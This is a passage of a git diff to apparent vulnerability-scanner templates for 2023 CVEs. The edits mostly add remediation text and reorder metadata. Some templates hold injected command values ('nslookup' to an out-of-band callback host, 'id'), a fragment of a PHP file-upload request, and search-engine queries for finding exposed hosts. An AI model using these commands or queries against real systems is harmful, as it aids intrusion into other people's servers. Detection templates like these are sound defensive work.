a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: - https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md - https://github.com/AetherBlack/CVE/tree/main/PMB @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-24737 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* epss-percentile: 0.26173 + cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:1469328760 verified: true + max-request: 1 vendor: pmb_project product: pmb + shodan-query: http.favicon.hash:1469328760 tags: cve,cve2023,xss,pmb http: diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 9cc6fb796a..24ee7f3b52 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py - https://nvd.nist.gov/vuln/detail/CVE-2023-25135 - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch - remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-25135 cwe-id: CWE-502 epss-score: 0.74668 - cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* epss-percentile: 0.97724 + cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* metadata: - max-request: 1 verified: true - google-query: intext:"Powered By vBulletin" - shodan-query: http.component:"vBulletin" + max-request: 1 vendor: vbulletin product: vbulletin + shodan-query: http.component:"vBulletin" + google-query: intext:"Powered By vBulletin" tags: cve,cve2023,vbulletin,rce,kev http: diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index 7574c6dc0c..1b8c23df0c 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse. + remediation: | + Apply the latest security patches or updates provided by the GeoServer project to fix the SQL Injection vulnerability. reference: - https://twitter.com/parzel2/status/1665726454489915395 - https://nvd.nist.gov/vuln/detail/CVE-2023-25157 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-25157 cwe-id: CWE-89 epss-score: 0.3525 - cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* epss-percentile: 0.96575 + cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: title:"geoserver" verified: "true" + max-request: 3 vendor: osgeo product: geoserver + shodan-query: title:"geoserver" tags: cve,cve2023,geoserver,ogc,sqli,intrusive http: diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index 489e63406d..f4e0d7c210 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found. + remediation: | + Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346 - https://nvd.nist.gov/vuln/detail/CVE-2023-25346 @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-25346 cwe-id: CWE-79 epss-score: 0.00089 - cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* epss-percentile: 0.36851 + cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: churchcrm product: churchcrm tags: cve,cve2023,churchcrm,xss,authenticated diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 47a6952711..500447f9b4 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request. + remediation: | + Apply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability. reference: - https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ - https://support.ruckuswireless.com/security_bulletins/315 @@ -16,15 +18,15 @@ info: cve-id: CVE-2023-25717 cwe-id: CWE-94 epss-score: 0.96566 - cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:* epss-percentile: 0.99438 + cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"ruckus wireless" - fofa-query: title="ruckus wireless" + max-request: 1 vendor: ruckuswireless product: ruckus_wireless_admin + shodan-query: title:"ruckus wireless" + fofa-query: title="ruckus wireless" tags: cve,cve2023,ruckus,rce,kev http: diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 1ef2d7949c..03cced30db 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4). + remediation: | + Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability. reference: - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/ - https://github.com/horizon3ai/CVE-2023-26067 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-26067 cwe-id: CWE-20 epss-score: 0.02039 - cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.87518 + cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: "Server: Lexmark_Web_Server" + max-request: 1 vendor: lexmark product: cxtpc_firmware + shodan-query: "Server: Lexmark_Web_Server" tags: cve,cve2023,printer,iot,lexmark variables: cmd: 'nslookup {{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index c91bcbc7f2..d961c4c9b5 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -6,6 +6,8 @@ info: severity: high description: | STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade STAGIL Navigation for Jira Menu & Themes to version 2.0.52 or higher to fix the Local File Inclusion vulnerability. reference: - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md - https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-26255 cwe-id: CWE-22 epss-score: 0.14175 - cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* epss-percentile: 0.94985 + cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 - shodan-query: title:Jira - framework: jira vendor: stagil product: stagil_navigation + framework: jira + shodan-query: title:Jira tags: cve,cve2023,lfi,jira,cms,atlassian http: diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 138e152e24..2c5f8c2e5b 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -6,6 +6,8 @@ info: severity: high description: | STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade STAGIL Navigation for Jira Menu & Themes to version 2.0.52 or higher to fix the Local File Inclusion vulnerability. reference: - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26256.md - https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-26256 cwe-id: CWE-22 epss-score: 0.00612 - cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* epss-percentile: 0.76007 + cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 - shodan-query: title:Jira - framework: jira vendor: stagil product: stagil_navigation + framework: jira + shodan-query: title:Jira tags: cve,cve2023,lfi,jira,cms,atlassian http: diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index 2c00123b54..f02043e8a0 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier + remediation: | + Apply the necessary security patches or updates provided by Adobe to fix the vulnerability. reference: - https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis - https://nvd.nist.gov/vuln/detail/CVE-2023-26360 @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-26360 cwe-id: CWE-284 epss-score: 0.90844 - cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* epss-percentile: 0.98442 + cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.component:"Adobe ColdFusion" verified: true + max-request: 1 vendor: "adobe" product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" tags: packetstorm,cve,cve2023,adobe,coldfusion,lfi,kev http: diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index 1ebcc32b1a..2af82f3e94 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server. + remediation: | + Upgrade Jorani to a patched version or apply the necessary security patches. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-26469 - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-26469 cwe-id: CWE-22 epss-score: 0.22328 - cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* epss-percentile: 0.95851 + cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.favicon.hash:-2032163853 verified: true + max-request: 3 vendor: jorani product: jorani + shodan-query: http.favicon.hash:-2032163853 tags: cve,cve2023,jorani,rce,packetstorm variables: cmd: "id" diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index 9938fec451..cab7d32bce 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -6,20 +6,21 @@ info: severity: critical description: | A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. + remediation: | + Apply the latest security patch or upgrade to a patched version of Weaver E-Office. reference: - https://github.com/sunyixuan1228/cve/blob/main/weaver.md - https://nvd.nist.gov/vuln/detail/CVE-2023-2648 classification: - cve-id: CVE-2023-2648 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2023-2648 cwe-id: CWE-434 metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: app="泛微-EOffice" tags: cve,cve2023,weaver,eoffice,ecology,fileupload,rce - variables: file: '{{rand_base(5, "abc")}}' @@ -37,7 +38,6 @@ http: ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt - - | POST /attachment/{{name}}/{{file}}.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 56d1b12a28..7681ba2887 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php. + remediation: | + Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26842 - https://nvd.nist.gov/vuln/detail/CVE-2023-26842 @@ -15,11 +17,11 @@ info: cve-id: CVE-2023-26842 cwe-id: CWE-79 epss-score: 0.00148 - cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* epss-percentile: 0.50119 + cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: churchcrm product: churchcrm tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 2e1afdac65..4e952f066f 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php. + remediation: | + Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26843 - https://nvd.nist.gov/vuln/detail/CVE-2023-26843 @@ -16,11 +18,11 @@ info: cve-id: CVE-2023-26843 cwe-id: CWE-79 epss-score: 0.00146 - cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* epss-percentile: 0.49905 + cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: churchcrm product: churchcrm tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 7e37877921..9669c72914 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ATutor < 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter. + remediation: | + Upgrade ATutor to version 2.2.2 or above to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-27008 - https://plantplants213607121.wordpress.com/2023/02/16/atutor-2-2-1-cross-site-scripting-via-the-token-body-parameter/ @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-27008 cwe-id: CWE-79 epss-score: 0.00081 - cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* epss-percentile: 0.33383 + cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.html:"Atutor" + max-request: 1 vendor: atutor product: atutor + shodan-query: http.html:"Atutor" tags: cve,cve2023,xss,atutor http: diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 2f5722fa01..4659e7c454 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034 - https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html @@ -17,13 +19,13 @@ info: cve-id: CVE-2023-27034 cwe-id: CWE-89 epss-score: 0.00572 - cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* epss-percentile: 0.75071 + cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* metadata: max-request: 2 - framework: prestashop vendor: joommasters product: jms_blog + framework: prestashop tags: cve,cve2023,prestashop,prestashop-module,sqli,intrusive http: diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index d907130349..459b527659 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Appwrite to a version higher than 1.2.1 to mitigate the SSRF vulnerability. reference: - https://gist.github.com/b33t1e/43b26c31e895baf7e7aea2dbf9743a9a - https://notes.sjtu.edu.cn/gMNlpByZSDiwrl9uZyHTKA @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-27159 cwe-id: CWE-918 epss-score: 0.00262 - cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* epss-percentile: 0.63161 + cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Sign In - Appwrite" + max-request: 1 vendor: appwrite product: appwrite + shodan-query: title:"Sign In - Appwrite" tags: cve,cve2023,appwrite,ssrf,oast http: diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index dedc8beb52..99bfb5fca5 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -6,6 +6,8 @@ info: severity: high description: | GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php. + remediation: | + Apply the latest patch or upgrade to a newer version of GDidees CMS. reference: - https://www.gdidees.eu/cms-1-0.html - https://gist.github.com/Hadi999/516aa25b953b0cba57089a0c11b1305b @@ -18,11 +20,11 @@ info: cve-id: CVE-2023-27179 cwe-id: CWE-434 epss-score: 0.03737 - cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* epss-percentile: 0.9061 + cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: gdidees product: gdidees_cms tags: packetstorm,cve,cve2023,file-download,gdidees,lfr diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 09aea3ea9d..3610e1c372 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations. + remediation: | + Apply the latest patch or update to the latest version of OpenCATS to fix the open redirect vulnerability. reference: - https://www.tenable.com/security/research/tra-2023-8 - https://nvd.nist.gov/vuln/detail/CVE-2023-27292 @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-27292 cwe-id: CWE-601 epss-score: 0.00073 - cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* epss-percentile: 0.30323 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"opencats" verified: true + max-request: 2 vendor: opencats product: opencats + shodan-query: title:"opencats" tags: authenticated,tenable,cve,cve2023,opencats,redirect http: diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index 16273ab8a9..70c045fea9 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. + remediation: | + Upgrade to a patched version of MStore API (version 3.9.3 or above) to mitigate the authentication bypass vulnerability. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/f00761a7-fe24-49a3-b3e3-a471e05815c1?source=cve - https://github.com/RandomRobbieBF/CVE-2023-2732 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-2732 cwe-id: CWE-288 epss-score: 0.04948 - cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* epss-percentile: 0.91796 + cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: inspireui product: mstore_api + framework: wordpress tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,mstore-api http: diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 69d95c8135..f3730e1078 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/ - https://nvd.nist.gov/vuln/detail/CVE-2023-27350 @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-27350 cwe-id: CWE-284,NVD-CWE-Other epss-score: 0.97086 - cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* epss-percentile: 0.99667 + cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: - max-request: 10 - shodan-query: http.html:"PaperCut" verified: true + max-request: 10 vendor: papercut product: papercut_mf + shodan-query: http.html:"PaperCut" tags: packetstorm,cve,cve2023,papercut,rce,oast,unauth,kev variables: cmd: "nslookup {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index acc1ab25e6..bc0497236d 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. + remediation: | + Apply the latest security patches or upgrade to a patched version of SPIP. reference: - https://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2023-27372 @@ -17,14 +19,14 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27372 epss-score: 0.97084 - cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* epss-percentile: 0.99665 + cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: html:"spip.php?page=backend" verified: "true" + max-request: 2 vendor: spip product: spip + shodan-query: html:"spip.php?page=backend" tags: packetstorm,cve,cve2023,spip,rce http: diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index dabb86049c..dd868fb49e 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected. + remediation: | + The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet. reference: - https://www.elttam.com/blog/pwnassistant/ - https://github.com/elttam/publications/blob/master/writeups/home-assistant/supervisor-authentication-bypass-advisory.md @@ -13,22 +15,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-27482 - https://github.com/home-assistant/core/security/advisories/GHSA-2j8f-h4mr-qr25 - https://xz.aliyun.com/t/12572 - remediation: | - The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-27482 cwe-id: CWE-287 epss-score: 0.03052 - cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* epss-percentile: 0.89691 + cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true - shodan-query: title:"Home Assistant" + max-request: 3 vendor: home-assistant product: home-assistant + shodan-query: title:"Home Assistant" tags: cve,cve2023,homeassistant,auth-bypass,rce http: diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index c149df55e1..62522af1e7 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK,_0xf4n9x_ severity: critical description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. + remediation: | + Apply the latest security patches or upgrade to a patched version of Apache Superset. reference: - https://github.com/horizon3ai/CVE-2023-27524 - https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-27524 cwe-id: CWE-1188 epss-score: 0.65287 - cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* epss-percentile: 0.97448 + cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: - max-request: 45 verified: true - shodan-query: html:"Apache Superset" + max-request: 45 vendor: apache product: superset + shodan-query: html:"Apache Superset" tags: packetstorm,cve,cve2023,apache,superset,auth-bypass http: diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 2f61511195..05146bb2d6 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ 